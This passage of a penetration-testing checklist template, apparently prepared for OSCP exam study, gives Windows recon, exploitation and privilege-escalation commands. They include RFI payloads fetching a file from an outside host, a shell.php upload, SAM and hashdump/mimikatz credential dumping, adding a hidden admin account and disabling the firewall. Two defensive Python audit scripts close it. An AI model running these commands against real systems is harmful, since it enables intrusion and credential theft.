```

### Databases

### SSH-Keys

### Browser

### Mail

```
/var/mail
/var/spool/mail
```

### GUI

If there is a GUI we want to check out the browser.

```
echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION
```

## How to replicate:

================================================
FILE: templates/windows-template.md
================================================

## Info-sheet

- DNS-Domain name:
- Host name:
- OS:
- Server:
- Workgroup:
- Windows domain:
- Services and ports:

INSERTTCPSCAN

## Recon

```
# Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```

### Port 21 - FTP

- Name:
- Version:
- Anonymous login:

INSERTFTPTEST

```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```

### Port 22 - SSH

- Name:
- Version:
- Protocol:
- RSA-key-fingerprint:
- Takes-password:

If you have usernames, test login with username:username.

INSERTSSHCONNECT

### Port 25

- Name:
- Version:
- VRFY:
- EXPN:

INSERTSMTPCONNECT

```
nc -nvv INSERTIPADDRESS 25
HELO foo

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```

### Port 110 - Pop3

- Name:
- Version:

INSERTPOP3CONNECT

### Port 135 - MSRPC

Some versions are vulnerable.

```
nmap INSERTIPADDRESS --script=msrpc-enum
```

Exploit:

```
msf > use exploit/windows/dcerpc/ms03_026_dcom
```

### Port 139/445 - SMB

- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:

```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse INSERTIPADDRESS -p 445

enum4linux -a INSERTIPADDRESS

rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john

# Log in with shell:
winexe -U username //INSERTIPADDRESS "cmd.exe" --system
```

### Port 161/162 UDP - SNMP

```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```

```
# Common community strings
public
private
community
```

### Port 554 - RTSP

### Port 1030/1032/1033/1038

Used by RPC to connect in a domain network. Usually nothing.

### Port 1433 - MSSQL

- Version:

```
use auxiliary/scanner/mssql/mssql_ping

# Last option. Brute force.
scanner/mssql/mssql_login

# Log in to mssql
sqsh -S INSERTIPADDRESS -U sa

# Execute commands
xp_cmdshell 'date'
go
```

If you have credentials, look in metasploit for other modules.

### Port 1521 - Oracle

- Name:
- Version:
- Password protected:

```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```

### Port 2100 - Oracle XML DB

Can be accessed through ftp.
Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

- Name:
- Version:

Default logins:

```
sys:sys
scott:tiger
```

### Port 2049 - NFS

```
showmount -e INSERTIPADDRESS

# If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```

### Port 3306 - MySQL

- Name:
- Version:

```
mysql --host=INSERTIPADDRESS -u root -p

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
```

### Port 3339 - Oracle web interface

- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:

### Port 3389 - Remote desktop

Test logging in to see what OS is running.

```
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%

# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```

### Port 80

- Server:
- Scripting language:
- Apache Modules:
- Domain-name address:

INSERTCURLHEADER

- Web application
- Name:
- Version:

```
# Nikto
nikto -h http://INSERTIPADDRESS

# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

# Get header
curl -i INSERTIPADDRESS

# Get everything
curl -i -L INSERTIPADDRESS

# Check if it is possible to upload using put
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php

# Check for title and all links
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```

#### Nikto scan

INSERTNIKTOSCAN

#### Url brute force

```
# Dirb
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

# Gobuster - remove irrelevant response codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

INSERTDIRBSCAN

#### Default/Weak login

Google the documentation for default passwords and test them:

```
site:webapplication.com password
```

```
admin admin
admin password
admin admin nameofservice
root root
root admin
root password
root nameofservice
password admin
username nameofservice
```

#### LFI/RFI

```
# Kadimus
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=

# Bypass execution
http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d savefile.php

# Bypass extension
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?
```

#### SQL-Injection

```
# Post
./sqlmap.py -r search-test.txt -p tfUPass

# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```

#### Sql-login-bypass

- Open Burp-suite
- Make and intercept request
- Send to intruder
- Cluster attack
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation

### Password brute force - last resort

```
cewl
```

### Port 443 - HTTPS

Heartbleed:

```
sslscan INSERTIPADDRESS:443
```

## Vulnerability analysis

Now we have gathered information about the system. Now comes the part where we look for exploits, vulnerabilities and features.

### To try - List of possibilities

Add possible exploits here:

### Find sploits - Searchsploit and google

Where there are many exploits for a piece of software, use google. It will automatically sort them by popularity.
```
site:exploit-db.com apache 2.4.7

# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```

----------------------------------------------------------------------------
'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
-----------------------------------------------------------------------------

## Privilege escalation

Now we start the whole enumeration process over again. This is a checklist. You need to check off every single one, in this order.

- Kernel exploits
- Cleartext password
- Reconfigure service parameters
- Inside service
- Program running as root
- Installed software
- Scheduled tasks
- Weak passwords

### To-try list

Here you will add all possible leads. What to try.

### Basic info

- OS:
- Version:
- Architecture:
- Current user:
- Hotfixes:
- Antivirus:

**Users:**

**Localgroups:**

```
systeminfo
set
hostname
net users
net user user1
net localgroup
accesschk.exe -uwcqv "Authenticated Users" *
netsh firewall show state
netsh firewall show config

# Set path
set PATH=%PATH%;C:\xampp\php
```

### Kernel exploits

```
# Look for hotfixes
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search for exploits
site:exploit-db.com windows XX XX
```

### Cleartext passwords

```
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Reconfigure service parameters

- Unquoted service paths. Check the book for instructions.
- Weak service permissions. Check the book for instructions.

### Inside service

Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.

```
# Meterpreter
run get_local_subnets

netstat /a
netstat -ano
```

### Programs running as root/system

### Installed software

```
# Metasploit
ps

tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

# Look in:
# C:\Program files
# C:\Program files (x86)
# Home directory of the user
```

### Scheduled tasks

```
schtasks /query /fo LIST /v

# Check this file:
c:\WINDOWS\SchedLgU.Txt
```

### Weak passwords

Remote desktop:

```
ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```

### Useful commands

**Add user and enable RDP**

```
net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Turn firewall off
netsh firewall set opmode disable

# Or like this
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# If you get this error:
#   "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
#   Failed to connect, CredSSP required by server."
# Add this reg key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```

------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT -------------------
------------------------------------------------------------------------

## Loot

- Proof:
- Network secret:
- Password and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:

### Proof

### Network secret

### Passwords and hashes

```
wce32.exe -w
wce64.exe -w
fgdump.exe
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

# Meterpreter
hashdump
load mimikatz
msv
```

### Dualhomed

```
ipconfig /all
route print

# What other machines have been connected
arp -a
```

### Tcpdump

```
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
```

### Interesting files

```
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search
dir /s
```

### Mail

### Browser

- Browser start-page:
- Browser-history:
- Saved passwords:

### Databases

### SSH-keys

## How to replicate:
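As an added example for the Cronjob and SSH Keys checks of the Linux template above (this is not code from the xapax/oscp repo), the script below turns the manual `ls -al` / `cat` checks into a permission audit a host owner can run: it reports crontabs, and the programs they execute, that group or other users can write, plus private keys readable by others and `authorized_keys` files writable by others. It reads the same locations the template lists; the file tree it audits is constructed in a temporary directory, and the function names `audit_cron`, `audit_ssh`, `build_sample_tree` and `run_demo` are this example's own.

```python
import os
import stat
import tempfile

# Paths the Linux template checks. Spool crontabs carry no user field.
CRON_TABLES = [("etc/crontab", True), ("etc/cron.d", True),
               ("var/spool/cron/crontabs", False)]
CRON_SCRIPT_DIRS = ["etc/cron.hourly", "etc/cron.daily", "etc/cron.weekly", "etc/cron.monthly"]
PRIVATE_KEYS = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519", "identity",
                "ssh_host_rsa_key", "ssh_host_dsa_key", "ssh_host_key"}
GROUP_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH
GROUP_OTHER_READ = stat.S_IRGRP | stat.S_IROTH

def _files_under(root, rel):
    """Yield every regular file at root/rel, whether it is a file or a tree."""
    path = os.path.join(root, rel)
    if os.path.isfile(path):
        yield path
    elif os.path.isdir(path):
        for dirpath, _, names in os.walk(path):
            for name in names:
                yield os.path.join(dirpath, name)

def _loose(path, bits):
    """True if any of the given group/other mode bits is set on the file."""
    return bool(os.stat(path).st_mode & bits)

def cron_commands(table, has_user_field):
    """Yield the absolute program paths that the entries of one crontab run."""
    with open(table) as fh:
        for line in fh:
            fields = line.split()
            if not fields or fields[0].startswith("#") or "=" in fields[0]:
                continue  # blank line, comment or VAR=value assignment
            skip = 1 if fields[0].startswith("@") else 5  # @daily vs. five time fields
            skip += 1 if has_user_field else 0
            if len(fields) > skip and fields[skip].startswith("/"):
                yield fields[skip]

def audit_cron(root="/"):
    """Sorted (crontab, writable_path) pairs: the table itself, or a program it
    runs, can be modified by group/other, i.e. by someone other than its owner."""
    findings = set()
    for rel, has_user in CRON_TABLES:
        for table in _files_under(root, rel):
            table_rel = os.path.relpath(table, root)
            if _loose(table, GROUP_OTHER_WRITE):
                findings.add((table_rel, table_rel))
            for cmd in cron_commands(table, has_user):
                target = os.path.join(root, cmd.lstrip("/"))
                if os.path.isfile(target) and _loose(target, GROUP_OTHER_WRITE):
                    findings.add((table_rel, os.path.relpath(target, root)))
    for rel in CRON_SCRIPT_DIRS:
        for script in _files_under(root, rel):
            if _loose(script, GROUP_OTHER_WRITE):
                findings.add((os.path.relpath(script, root),) * 2)
    return sorted(findings)

def audit_ssh(root="/"):
    """Sorted (path, issue) pairs: private keys readable by group/other and
    authorized_keys files writable by group/other, under the template's paths."""
    findings = []
    for base in ("root", "home", "etc/ssh"):
        for path in _files_under(root, base):
            name, rel = os.path.basename(path), os.path.relpath(path, root)
            if name in PRIVATE_KEYS and _loose(path, GROUP_OTHER_READ):
                findings.append((rel, "readable"))
            elif name == "authorized_keys" and _loose(path, GROUP_OTHER_WRITE):
                findings.append((rel, "writable"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample host (not a real system): a few safe and weak entries."""
    def put(rel, content, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    put("etc/crontab", "SHELL=/bin/sh\n0 3 * * * root /usr/bin/updatedb\n"
                       "* * * * * root /usr/local/bin/backup.sh\n", 0o644)
    put("usr/bin/updatedb", "", 0o755)                    # fine
    put("usr/local/bin/backup.sh", "#!/bin/sh\n", 0o777)  # root runs it, anyone can edit it
    put("etc/cron.d/weak", "*/5 * * * * root /bin/true\n", 0o666)  # table itself writable
    put("var/spool/cron/crontabs/root", "@daily /opt/cleanup.sh\n", 0o600)
    put("opt/cleanup.sh", "", 0o775)                      # group-writable program
    put("root/.ssh/id_rsa", "", 0o600)                    # fine
    put("home/alice/.ssh/id_rsa", "", 0o644)              # private key readable by all
    put("home/alice/.ssh/authorized_keys", "", 0o664)     # group could add a key

def run_demo():
    """Build the sample tree in a temp dir and return both audits' findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit_cron(root), audit_ssh(root)

if __name__ == "__main__":
    cron, ssh = run_demo()
    for table, target in cron:
        print("cron: %s -> %s is writable by group/other" % (table, target))
    for path, issue in ssh:
        print("ssh: %s is %s by group/other" % (path, issue))
```

On a real host call `audit_cron()` and `audit_ssh()` with the default root of `/` as root, so every spool crontab and home directory is readable. Every pair from `audit_cron` is a place where a non-owner can change what cron executes as the table's user; the fix is `chown root` plus a mode of 644 for tables and 755 for the programs they run. The audit only follows the first token of each command, so a job such as `/bin/sh /tmp/x.sh` needs a manual look.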
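The "Inside service" check of the Windows template above tells you to compare what `netstat -ano` shows on the host with what was reachable from outside. As an added example (not code from the xapax/oscp repo), the parser below reads that output and splits the listening sockets into those bound to loopback only and those bound to a network-facing address, which is exactly the set that never shows up in an external port scan. The `netstat -ano` text is a constructed sample, not a capture from a real machine, and the function names are this example's own.

```python
# Constructed sample of Windows `netstat -ano` output (not from a real host):
# loopback-only listeners on 3306, 8080 and UDP 1900, the rest on all interfaces.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       856
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       1320
  TCP    192.168.1.50:49158     192.168.1.10:445       ESTABLISHED     4
  TCP    [::]:3389              [::]:0                 LISTENING       1044
  TCP    [::1]:8080             [::]:0                 LISTENING       2210
  UDP    0.0.0.0:161            *:*                                    1500
  UDP    127.0.0.1:1900         *:*                                    3012
"""

LOOPBACK_PREFIXES = ("127.", "::1")

def split_endpoint(endpoint):
    """'127.0.0.1:3306' -> ('127.0.0.1', 3306); '[::1]:8080' -> ('::1', 8080)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)

def parse_netstat(text):
    """Parse `netstat -ano` rows into dicts. UDP rows have no State column,
    so a bound UDP socket is treated as LISTENING."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue  # header, blank line or "Active Connections"
        proto, local, foreign = fields[0], fields[1], fields[2]
        state = fields[3] if proto == "TCP" else "LISTENING"
        host, port = split_endpoint(local)
        rows.append({"proto": proto, "host": host, "port": port,
                     "foreign": foreign, "state": state, "pid": int(fields[-1])})
    return rows

def listeners_by_exposure(text):
    """Group listening sockets as (proto, port, pid) by whether they are bound
    to loopback only or to an address reachable from the network."""
    internal, external = [], []
    for row in parse_netstat(text):
        if row["state"] != "LISTENING":
            continue
        bucket = internal if row["host"].startswith(LOOPBACK_PREFIXES) else external
        bucket.append((row["proto"], row["port"], row["pid"]))
    return {"internal_only": sorted(internal), "external": sorted(external)}

if __name__ == "__main__":
    groups = listeners_by_exposure(SAMPLE_NETSTAT)
    for label in ("external", "internal_only"):
        print(label)
        for proto, port, pid in groups[label]:
            print("  %s %5d  pid %d" % (proto, port, pid))
```

Feed it the saved output of `netstat -ano` instead of `SAMPLE_NETSTAT` to get the real lists. Anything in `external` that the earlier port scan did not show points at a host firewall rule; anything in `internal_only` is a service that only matters once someone is already on the box, which is why the template has you look at it during privilege escalation and why it belongs in a hardening review just as much as the externally exposed ports.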